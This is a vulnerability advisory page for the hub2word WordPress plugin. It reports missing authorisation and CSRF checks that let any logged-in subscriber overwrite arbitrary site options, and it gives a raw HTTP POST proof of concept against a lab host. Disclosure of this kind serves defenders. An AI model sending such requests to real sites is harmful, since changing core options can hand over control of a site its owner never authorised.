hub2word <= 1.1.0 – Subscriber+ Arbitrary Options Update | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in its Hub2Word_save_settings AJAX action, and does not validate the option key to be updated. As a result, any authenticated user, such as subscriber could update arbitrary WordPress options

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/admin.php?page=WPvivid
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Connection: close
Cookie: [any authenticated user]

action=Hub2Word_save_settings&opt_name=blogname&opt_value=Yolo

Affects Plugins

No known fix

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

74cbad0b-c187-4b0b-b449-5ad41fef398a

Timeline

Publicly Published

2022-02-16 (about 4 years ago)

Added

2022-02-16 (about 4 years ago)

Last Updated

2022-02-16 (about 4 years ago)

Other

Published

Title

Published

2024-07-08

Title

XPlainer – WooCommerce Product FAQ [WooCommerce Accordion FAQ Plugin] < 1.7.1 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2025-04-16

Title

Zephyr Project Manager < 3.3.201 - Missing Authorization

Published

2025-04-17

Title

Cloak Front End Email < 1.9.6 - Missing Authorization

Published

2025-11-03

Title

Simple User Capabilities <= 1.0 - Missing Authorization to Unauthenticated Capability Reset

Published

2025-07-17

Title

Listly: Listicles For WordPress <= 2.7 - Unauthenticated Arbitrary Transient Deletion